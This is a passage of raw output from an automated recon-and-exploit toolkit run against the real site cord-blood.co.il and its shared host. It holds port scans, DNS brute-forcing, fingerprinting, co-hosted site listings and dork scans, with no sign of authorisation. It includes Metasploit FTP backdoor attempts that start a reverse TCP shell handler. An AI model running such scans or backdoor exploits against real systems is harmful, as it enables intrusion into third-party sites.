705. cord-blood.co.il mail is handled by 10 mailgw2.spd.co.il.
706. ======================================================================================================================================
707. CHECKING OS FINGERPRINT
708. ======================================================================================================================================
709.  
710. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
711.  
712. [+] Target is cord-blood.co.il
713. [+] Loading modules.
714. [+] Following modules are loaded:
715. [x] [1] ping:icmp_ping - ICMP echo discovery module
716. [x] [2] ping:tcp_ping - TCP-based ping discovery module
717. [x] [3] ping:udp_ping - UDP-based ping discovery module
718. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
719. [x] [5] infogather:portscan - TCP and UDP PortScanner
720. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
721. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
722. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
723. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
724. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
725. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
726. [x] [12] fingerprint:smb - SMB fingerprinting module
727. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
728. [+] 13 modules registered
729. [+] Initializing scan engine
730. [+] Running scan engine
731. [-] ping:tcp_ping module: no closed/open TCP ports known on 80.179.142.111. Module test failed
732. [-] ping:udp_ping module: no closed/open UDP ports known on 80.179.142.111. Module test failed
733. [-] No distance calculation. 80.179.142.111 appears to be dead or no ports known
734. [+] Host: 80.179.142.111 is up (Guess probability: 50%)
735. [+] Target: 80.179.142.111 is alive. Round-Trip Time: 1.01174 sec
736. [+] Selected safe Round-Trip Time value is: 2.02347 sec
737. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
738. [-] fingerprint:smb need either TCP port 139 or 445 to run
739. [+] Primary guess:
740. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
741. [+] Other guesses:
742. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
743. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
744. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
745. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
746. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
747. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
748. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
749. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
750. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
751. [+] Cleaning up scan engine
752. [+] Modules deinitialized
753. [+] Execution completed.
754. #######################################################################################################################################
755. ----- cord-blood.co.il -----
756.  
757.  
758. Host's addresses:
759. __________________
760.  
761. cord-blood.co.il. 14380 IN A 80.179.142.111
762.  
763.  
764. Name Servers:
765. ______________
766.  
767. ns2.spd.co.il. 31989 IN A 80.179.148.8
768. ns1.spd.co.il. 27534 IN A 212.199.164.175
769.  
770.  
771. Mail (MX) Servers:
772. ___________________
773.  
774. mailgw2.spd.co.il. 38400 IN A 192.116.71.71
775.  
776.  
777. Trying Zone Transfers and getting Bind Versions:
778. _________________________________________________
779.  
780.  
781. Trying Zone Transfer for cord-blood.co.il on ns2.spd.co.il ...
782.  
783. Trying Zone Transfer for cord-blood.co.il on ns1.spd.co.il ...
784.  
785. brute force file not specified, bay.
786. =======================================================================================================================================
787. GATHERING DNS SUBDOMAINS
788. =======================================================================================================================================
789.  
790. ____ _ _ _ _ _____
791. / ___| _ _| |__ | (_)___| |_|___ / _ __
792. \___ \| | | | '_ \| | / __| __| |_ \| '__|
793. ___) | |_| | |_) | | \__ \ |_ ___) | |
794. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
795.  
796. # Coded By Ahmed Aboul-Ela - @aboul3la
797.  
798. [-] Enumerating subdomains now for cord-blood.co.il
799. [-] verbosity is enabled, will show the subdomains results in realtime
800. [-] Searching now in Baidu..
801. [-] Searching now in Yahoo..
802. [-] Searching now in Google..
803. [-] Searching now in Bing..
804. [-] Searching now in Ask..
805. [-] Searching now in Netcraft..
806. [-] Searching now in DNSdumpster..
807. [-] Searching now in Virustotal..
808. [-] Searching now in ThreatCrowd..
809. [-] Searching now in SSL Certificates..
810. [-] Searching now in PassiveDNS..
811. Virustotal: www.cord-blood.co.il
812. Yahoo: www.cord-blood.co.il
813. [-] Saving results to file: /usr/share/sniper/loot/cord-blood.co.il/domains/domains-cord-blood.co.il.txt
814. [-] Total Unique Subdomains Found: 1
815. www.cord-blood.co.il
816. #######################################################################################################################################
817. [+] Hosts found in search engines:
818. -------------------------------------------------------------------------------------------------------------------------------------
819. [-] Resolving hostnames IPs...
820. 80.179.142.111:www.cord-blood.co.il
821. [+] Virtual hosts:
822. ======================================================================================================================================
823. 80.179.142.111 www.migdalei.co.il
824. 80.179.142.111 www.insured.co.il
825. 80.179.142.111 www.etur.name
826. 80.179.142.111 www.leyda.co.il
827. 80.179.142.111 www.caraccident.co.il
828. 80.179.142.111 www.alumt.co.il
829. 80.179.142.111 www.lala.co.il
830. 80.179.142.111 halloo.co.il
831. 80.179.142.111 www.elulbm.org.il
832. 80.179.142.111 www.voices.org.il
833. 80.179.142.111 www.rofeyeladim.co.il
834. 80.179.142.111 www.mdnet.co.il
835. 80.179.142.111 www.betichut.org.il
836. 80.179.142.111 www.shapeworks.co.il
837. 80.179.142.111 www.eitanrd.org.il
838. 80.179.142.111 www.law-index.co.il
839. 80.179.142.111 www.bakbook.co.il
840. 80.179.142.111 www.iaba.org.il
841. 80.179.142.111 www.sederdin.com
842. 80.179.142.111 www.omerwingsail.com
843. #######################################################################################################################################
844. ======================================================================================================================================
845. PINGING HOST
846. ======================================================================================================================================
847. PING cord-blood.co.il (80.179.142.111) 56(84) bytes of data.
848. 64 bytes from yanir.spd.co.il (80.179.142.111): icmp_seq=1 ttl=52 time=731 ms
849.  
850. --- cord-blood.co.il ping statistics ---
851. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
852. rtt min/avg/max/mdev = 731.168/731.168/731.168/0.000 ms
853.  
854. #######################################################################################################################################
855.  
856. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:14 EDT
857. Nmap scan report for cord-blood.co.il (80.179.142.111)
858. Host is up (0.60s latency).
859. rDNS record for 80.179.142.111: yanir.spd.co.il
860. Not shown: 447 closed ports, 18 filtered ports
861. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
862. PORT STATE SERVICE
863. 21/tcp open ftp
864. 53/tcp open domain
865. 80/tcp open http
866. 110/tcp open pop3
867. 143/tcp open imap
868. 443/tcp open https
869. 587/tcp open submission
870. 993/tcp open imaps
871. 995/tcp open pop3s
872. 5353/tcp open mdns
873. 8080/tcp open http-proxy
874. #######################################################################################################################################
875. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:15 EDT
876. Nmap scan report for cord-blood.co.il (80.179.142.111)
877. Host is up.
878. rDNS record for 80.179.142.111: yanir.spd.co.il
879.  
880. PORT STATE SERVICE
881. 53/udp open|filtered domain
882. 67/udp open|filtered dhcps
883. 68/udp open|filtered dhcpc
884. 69/udp open|filtered tftp
885. 88/udp open|filtered kerberos-sec
886. 123/udp open|filtered ntp
887. 137/udp open|filtered netbios-ns
888. 138/udp open|filtered netbios-dgm
889. 139/udp open|filtered netbios-ssn
890. 161/udp open|filtered snmp
891. 162/udp open|filtered snmptrap
892. 389/udp open|filtered ldap
893. 520/udp open|filtered route
894. 2049/udp open|filtered nfs
895. #######################################################################################################################################
896. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:15 EDT
897. Nmap scan report for cord-blood.co.il (80.179.142.111)
898. Host is up (0.16s latency).
899. rDNS record for 80.179.142.111: yanir.spd.co.il
900.  
901. PORT STATE SERVICE VERSION
902. 21/tcp filtered ftp
903. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
904. Device type: firewall|general purpose
905. Running: Linux 2.4.X|2.6.X, ISS embedded
906. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
907. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
908.  
909. TRACEROUTE (using proto 1/icmp)
910. HOP RTT ADDRESS
911. 1 ... 30
912. #######################################################################################################################################
913. RHOST => cord-blood.co.il
914. RHOSTS => cord-blood.co.il
915. [*] cord-blood.co.il:21 - Banner: 220 FTP Server
916. [*] cord-blood.co.il:21 - USER: 331 Password required for RcBY:)
917. [*] Exploit completed, but no session was created.
918. [*] Started reverse TCP double handler on 10.211.1.5:4444
919. [*] cord-blood.co.il:21 - Sending Backdoor Command
920. [-] cord-blood.co.il:21 - Not backdoored
921. [*] Exploit completed, but no session was created.
922. + -- --=[Port 22 closed... skipping.
923. + -- --=[Port 23 closed... skipping.
924. + -- --=[Port 25 closed... skipping.
925. + -- --=[Port 53 opened... running tests...
926.  
927. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:16 EDT
928. Nmap scan report for cord-blood.co.il (80.179.142.111)
929. Host is up (0.099s latency).
930. rDNS record for 80.179.142.111: yanir.spd.co.il
931.  
932. PORT STATE SERVICE VERSION
933. 53/tcp filtered domain
934. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
935. Device type: firewall|general purpose
936. Running: Linux 2.4.X|2.6.X, ISS embedded
937. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
938. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
939.  
940. Host script results:
941. | dns-brute:
942. | DNS Brute-force hostnames:
943. | host.co.il - 148.251.90.173
944. | development.co.il - 46.101.238.24
945. | http.co.il - 212.150.243.210
946. | svn.co.il - 159.65.118.35
947. | mysql.co.il - 216.239.32.21
948. | mysql.co.il - 216.239.34.21
949. | mysql.co.il - 216.239.36.21
950. | mysql.co.il - 216.239.38.21
951. | images.co.il - 67.23.177.200
952. | test.co.il - 127.0.0.1
953. | news.co.il - 188.166.109.104
954. | info.co.il - 104.31.92.2
955. | info.co.il - 104.31.93.2
956. | info.co.il - 2400:cb00:2048:1:0:0:681f:5c02
957. | info.co.il - 2400:cb00:2048:1:0:0:681f:5d02
958. | test1.co.il - 192.185.236.196
959. | noc.co.il - 96.31.35.145
960. | test2.co.il - 209.88.192.216
961. | internet.co.il - 95.175.32.10
962. | testing.co.il - 192.117.125.106
963. | dns.co.il - 82.80.253.15
964. | intra.co.il - 62.219.78.158
965. | upload.co.il - 192.185.139.151
966. | ns1.co.il - 178.32.55.171
967. | intranet.co.il - 194.90.1.109
968. | ns2.co.il - 92.222.209.88
969. | vnc.co.il - 194.90.1.109
970. | voip.co.il - 212.179.240.8
971. | download.co.il - 148.251.90.173
972. | ntp.co.il - 107.154.156.178
973. | ntp.co.il - 107.154.163.178
974. | ops.co.il - 108.167.133.37
975. | erp.co.il - 69.163.219.179
976. | owa.co.il - 212.29.214.195
977. | exchange.co.il - 181.215.116.38
978. | pbx.co.il - 185.18.204.26
979. | linux.co.il - 81.218.80.235
980. | local.co.il - 173.212.236.162
981. | secure.co.il - 62.219.17.162
982. | log.co.il - 82.80.201.26
983. | server.co.il - 148.251.90.173
984. | shop.co.il - 188.166.109.104
985. | sip.co.il - 213.8.172.5
986. | manage.co.il - 192.117.172.13
987. | mobile.co.il - 182.50.132.56
988. | monitor.co.il - 194.90.1.109
989. | mta.co.il - 212.199.167.22
990. | adserver.co.il - 195.128.177.33
991. | alpha.co.il - 52.19.144.59
992. | alpha.co.il - 54.154.75.176
993. | app.co.il - 34.242.176.33
994. | apps.co.il - 72.52.4.122
995. | web.co.il - 192.115.21.75
996. | whois.co.il - 109.74.198.188
997. | beta.co.il - 185.70.251.47
998. | blog.co.il - 212.143.60.51
999. | www2.co.il - 64.90.49.227
1000. | firewall.co.il - 62.219.67.17
1001. | forum.co.il - 62.219.11.147
1002. | ftp.co.il - 198.23.57.32
1003. | sql.co.il - 192.254.237.210
1004. | squid.co.il - 23.99.97.249
1005. | git.co.il - 81.218.229.200
1006. | ssh.co.il - 81.218.229.185
1007. | ssl.co.il - 82.80.253.21
1008. | help.co.il - 82.80.209.181
1009. | stage.co.il - 52.58.94.54
1010. | chat.co.il - 95.175.47.103
1011. | citrix.co.il - 165.160.13.20
1012. | citrix.co.il - 165.160.15.20
1013. | cms.co.il - 194.90.203.76
1014. | corp.co.il - 204.93.178.102
1015. | crs.co.il - 136.243.93.246
1016. | cvs.co.il - 194.90.8.80
1017. | demo.co.il - 212.235.14.43
1018. |_ dev.co.il - 80.179.11.157
1019. #######################################################################################################################################
1020. Checking http://cord-blood.co.il
1021. Generic Detection results:
1022. The site http://cord-blood.co.il seems to be behind a WAF or some sort of security solution
1023. Reason: The server returned a different response code when a string trigged the blacklist.
1024. Normal response code is "404", while the response code to an attack is "302"
1025. Number of requests: 11
1026. #######################################################################################################################################
1027. + -- --=[Checking if X-Content options are enabled on cord-blood.co.il...
1028.  
1029. + -- --=[Checking if X-Frame options are enabled on cord-blood.co.il...
1030.  
1031. + -- --=[Checking if X-XSS-Protection header is enabled on cord-blood.co.il...
1032.  
1033. + -- --=[Checking HTTP methods on cord-blood.co.il...
1034.  
1035. + -- --=[Checking if TRACE method is enabled on cord-blood.co.il...
1036.  
1037. + -- --=[Checking for META tags on cord-blood.co.il...
1038.  
1039. + -- --=[Checking for open proxy on cord-blood.co.il...
1040. <html>Nginx is functioning normally</html>
1041.  
1042. + -- --=[Enumerating software on cord-blood.co.il...
1043. Server: nginx
1044. X-Powered-By: PHP/5.2.17
1045. X-Pingback: http://www.cord-blood.co.il/xmlrpc.php
1046.  
1047. + -- --=[Checking if Strict-Transport-Security is enabled on cord-blood.co.il...
1048.  
1049. + -- --=[Checking for Flash cross-domain policy on cord-blood.co.il...
1050. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1051. <html><head>
1052. <title>404 Not Found</title>
1053. </head><body>
1054. <h1>Not Found</h1>
1055. <p>The requested URL /crossdomain.xml was not found on this server.</p>
1056. <p>Additionally, a 404 Not Found
1057. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1058. </body></html>
1059.  
1060. + -- --=[Checking for Silverlight cross-domain policy on cord-blood.co.il...
1061. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1062. <html><head>
1063. <title>404 Not Found</title>
1064. </head><body>
1065. <h1>Not Found</h1>
1066. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
1067. <p>Additionally, a 404 Not Found
1068. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1069. </body></html>
1070.  
1071. + -- --=[Checking for HTML5 cross-origin resource sharing on cord-blood.co.il...
1072.  
1073. + -- --=[Retrieving robots.txt on cord-blood.co.il...
1074. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1075. <html><head>
1076. <title>404 Not Found</title>
1077. </head><body>
1078. <h1>Not Found</h1>
1079. <p>The requested URL /robots.txt was not found on this server.</p>
1080. <p>Additionally, a 404 Not Found
1081. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1082. </body></html>
1083.  
1084. + -- --=[Retrieving sitemap.xml on cord-blood.co.il...
1085. <changefreq>weekly</changefreq>
1086. <priority>0.6</priority>
1087. </url>
1088. <url>
1089. <loc>http://www.cord-blood.co.il/?page_id=2</loc>
1090. <lastmod>2009-07-07T17:13:36+00:00</lastmod>
1091. <changefreq>weekly</changefreq>
1092. <priority>0.6</priority>
1093. </url>
1094. <!-- Debug: End Postings --><!-- Debug: Start Custom Pages --><!-- Debug: End Custom Pages --><!-- Debug: Start additional URLs --><!-- Debug: End additional URLs --></urlset>
1095. + -- --=[Checking cookie attributes on cord-blood.co.il...
1096.  
1097. + -- --=[Checking for ASP.NET Detailed Errors on cord-blood.co.il...
1098. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1099. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1100. ######################################################################################################################################
1101. __[ ! ] Neither war between hackers, nor peace for the system.
1102. __[ ! ] http://blog.inurl.com.br
1103. __[ ! ] http://fb.com/InurlBrasil
1104. __[ ! ] http://twitter.com/@googleinurl
1105. __[ ! ] http://github.com/googleinurl
1106. __[ ! ] Current PHP version::[ 7.2.3-1 ]
1107. __[ ! ] Current script owner::[ root ]
1108. __[ ! ] Current uname::[ Linux JTSEC 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64 ]
1109. __[ ! ] Current pwd::[ /usr/share/sniper ]
1110. __[ ! ] Help: php inurlbr.php --help
1111. ------------------------------------------------------------------------------------------------------------------------
1112.  
1113. [ ! ] Starting SCANNER INURLBR 2.1 at [23-03-2018 00:24:45]
1114. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1115. It is the end user's responsibility to obey all applicable local, state and federal laws.
1116. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1117.  
1118. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cord-blood.co.il.txt ]
1119. [ INFO ][ DORK ]::[ site:cord-blood.co.il ]
1120. [ INFO ][ SEARCHING ]:: {
1121. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.mt ]
1122.  
1123. [ INFO ][ SEARCHING ]::
1124. -[:::]
1125. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1126.  
1127. [ INFO ][ SEARCHING ]::
1128. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1129. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sb ID: 010479943387663786936:wjwf2xkhfmq ]
1130.  
1131. [ INFO ][ SEARCHING ]::
1132. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1133.  
1134. [ INFO ][ TOTAL FOUND VALUES ]:: [ 74 ]
1135.  
1136.  
1137. _[ - ]::--------------------------------------------------------------------------------------------------------------
1138. |_[ + ] [ 0 / 74 ]-[00:25:12] [ - ]
1139. |_[ + ] Target:: [ http://www.cord-blood.co.il/ ]
1140. |_[ + ] Exploit::
1141. |_[ + ] Information Server:: , , IP::0
1142. |_[ + ] More details::
1143. |_[ + ] Found:: UNIDENTIFIED
1144. |_[ + ] ERROR CONECTION:: Resolving timed out after 5000 milliseconds
1145.  
1146. _[ - ]::--------------------------------------------------------------------------------------------------------------
1147. |_[ + ] [ 1 / 74 ]-[00:25:20] [ - ]
1148. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=11 ]
1149. |_[ + ] Exploit::
1150. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1151. |_[ + ] More details:: / - / , ISP:
1152. |_[ + ] Found:: UNIDENTIFIED
1153.  
1154. _[ - ]::--------------------------------------------------------------------------------------------------------------
1155. |_[ + ] [ 2 / 74 ]-[00:25:28] [ - ]
1156. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=22 ]
1157. |_[ + ] Exploit::
1158. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1159. |_[ + ] More details:: / - / , ISP:
1160. |_[ + ] Found:: UNIDENTIFIED
1161.  
1162. _[ - ]::--------------------------------------------------------------------------------------------------------------
1163. |_[ + ] [ 3 / 74 ]-[00:25:32] [ - ]
1164. |_[ + ] Target:: [ http://www.cord-blood.co.il/?page_id=2 ]
1165. |_[ + ] Exploit::
1166. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1167. |_[ + ] More details:: / - / , ISP:
1168. |_[ + ] Found:: UNIDENTIFIED
1169.  
1170. _[ - ]::--------------------------------------------------------------------------------------------------------------
1171. |_[ + ] [ 4 / 74 ]-[00:25:36] [ - ]
1172. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=50 ]
1173. |_[ + ] Exploit::
1174. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1175. |_[ + ] More details:: / - / , ISP:
1176. |_[ + ] Found:: UNIDENTIFIED
1177.  
1178. _[ - ]::--------------------------------------------------------------------------------------------------------------
1179. |_[ + ] [ 5 / 74 ]-[00:25:40] [ - ]
1180. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=40 ]
1181. |_[ + ] Exploit::
1182. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1183. |_[ + ] More details:: / - / , ISP:
1184. |_[ + ] Found:: UNIDENTIFIED
1185.  
1186. _[ - ]::--------------------------------------------------------------------------------------------------------------
1187. |_[ + ] [ 6 / 74 ]-[00:25:46] [ - ]
1188. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=15 ]
1189. |_[ + ] Exploit::
1190. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1191. |_[ + ] More details:: / - / , ISP:
1192. |_[ + ] Found:: UNIDENTIFIED
1193.  
1194. _[ - ]::--------------------------------------------------------------------------------------------------------------
1195. |_[ + ] [ 7 / 74 ]-[00:25:53] [ - ]
1196. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=44 ]
1197. |_[ + ] Exploit::
1198. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1199. |_[ + ] More details:: / - / , ISP:
1200. |_[ + ] Found:: UNIDENTIFIED
1201. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 3686 bytes received
1202.  
1203. _[ - ]::--------------------------------------------------------------------------------------------------------------
1204. |_[ + ] [ 8 / 74 ]-[00:25:57] [ - ]
1205. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=42 ]
1206. |_[ + ] Exploit::
1207. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1208. |_[ + ] More details:: / - / , ISP:
1209. |_[ + ] Found:: UNIDENTIFIED
1210.  
1211. _[ - ]::--------------------------------------------------------------------------------------------------------------
1212. |_[ + ] [ 9 / 74 ]-[00:26:01] [ - ]
1213. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=25 ]
1214. |_[ + ] Exploit::
1215. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1216. |_[ + ] More details:: / - / , ISP:
1217. |_[ + ] Found:: UNIDENTIFIED
1218.  
1219. _[ - ]::--------------------------------------------------------------------------------------------------------------
1220. |_[ + ] [ 10 / 74 ]-[00:26:07] [ - ]
1221. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=3 ]
1222. |_[ + ] Exploit::
1223. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1224. |_[ + ] More details:: / - / , ISP:
1225. |_[ + ] Found:: UNIDENTIFIED
1226.  
1227. _[ - ]::--------------------------------------------------------------------------------------------------------------
1228. |_[ + ] [ 11 / 74 ]-[00:26:10] [ - ]
1229. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=30 ]
1230. |_[ + ] Exploit::
1231. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1232. |_[ + ] More details:: / - / , ISP:
1233. |_[ + ] Found:: UNIDENTIFIED
1234.  
1235. _[ - ]::--------------------------------------------------------------------------------------------------------------
1236. |_[ + ] [ 12 / 74 ]-[00:26:14] [ - ]
1237. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=19 ]
1238. |_[ + ] Exploit::
1239. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1240. |_[ + ] More details:: / - / , ISP:
1241. |_[ + ] Found:: UNIDENTIFIED
1242.  
1243. _[ - ]::--------------------------------------------------------------------------------------------------------------
1244. |_[ + ] [ 13 / 74 ]-[00:26:20] [ - ]
1245. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=32 ]
1246. |_[ + ] Exploit::
1247. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1248. |_[ + ] More details:: / - / , ISP:
1249. |_[ + ] Found:: UNIDENTIFIED
1250.  
1251. _[ - ]::--------------------------------------------------------------------------------------------------------------
1252. |_[ + ] [ 14 / 74 ]-[00:26:24] [ - ]
1253. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=27 ]
1254. |_[ + ] Exploit::
1255. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1256. |_[ + ] More details:: / - / , ISP:
1257. |_[ + ] Found:: UNIDENTIFIED
1258.  
1259. _[ - ]::--------------------------------------------------------------------------------------------------------------
1260. |_[ + ] [ 15 / 74 ]-[00:26:27] [ - ]
1261. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=48 ]
1262. |_[ + ] Exploit::
1263. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1264. |_[ + ] More details:: / - / , ISP:
1265. |_[ + ] Found:: UNIDENTIFIED
1266.  
1267. _[ - ]::--------------------------------------------------------------------------------------------------------------
1268. |_[ + ] [ 16 / 74 ]-[00:26:31] [ - ]
1269. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=דם ]
1270. |_[ + ] Exploit::
1271. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1272. |_[ + ] More details:: / - / , ISP:
1273. |_[ + ] Found:: UNIDENTIFIED
1274.  
1275. _[ - ]::--------------------------------------------------------------------------------------------------------------
1276. |_[ + ] [ 17 / 74 ]-[00:26:36] [ - ]
1277. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מיילדת ]
1278. |_[ + ] Exploit::
1279. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1280. |_[ + ] More details:: / - / , ISP:
1281. |_[ + ] Found:: UNIDENTIFIED
1282.  
1283. _[ - ]::--------------------------------------------------------------------------------------------------------------
1284. |_[ + ] [ 18 / 74 ]-[00:26:40] [ - ]
1285. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=4 ]
1286. |_[ + ] Exploit::
1287. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1288. |_[ + ] More details:: / - / , ISP:
1289. |_[ + ] Found:: UNIDENTIFIED
1290.  
1291. _[ - ]::--------------------------------------------------------------------------------------------------------------
1292. |_[ + ] [ 19 / 74 ]-[00:26:44] [ - ]
1293. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=38 ]
1294. |_[ + ] Exploit::
1295. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1296. |_[ + ] More details:: / - / , ISP:
1297. |_[ + ] Found:: UNIDENTIFIED
1298.  
1299. _[ - ]::--------------------------------------------------------------------------------------------------------------
1300. |_[ + ] [ 20 / 74 ]-[00:26:47] [ - ]
1301. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=עובר ]
1302. |_[ + ] Exploit::
1303. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1304. |_[ + ] More details:: / - / , ISP:
1305. |_[ + ] Found:: UNIDENTIFIED
1306.  
1307. _[ - ]::--------------------------------------------------------------------------------------------------------------
1308. |_[ + ] [ 21 / 74 ]-[00:26:51] [ - ]
1309. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סרטן ]
1310. |_[ + ] Exploit::
1311. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1312. |_[ + ] More details:: / - / , ISP:
1313. |_[ + ] Found:: UNIDENTIFIED
1314.  
1315. _[ - ]::--------------------------------------------------------------------------------------------------------------
1316. |_[ + ] [ 22 / 74 ]-[00:26:55] [ - ]
1317. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=לידה ]
1318. |_[ + ] Exploit::
1319. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1320. |_[ + ] More details:: / - / , ISP:
1321. |_[ + ] Found:: UNIDENTIFIED
1322.  
1323. _[ - ]::--------------------------------------------------------------------------------------------------------------
1324. |_[ + ] [ 23 / 74 ]-[00:26:59] [ - ]
1325. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=אתיקה ]
1326. |_[ + ] Exploit::
1327. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1328. |_[ + ] More details:: / - / , ISP:
1329. |_[ + ] Found:: UNIDENTIFIED
1330.  
1331. _[ - ]::--------------------------------------------------------------------------------------------------------------
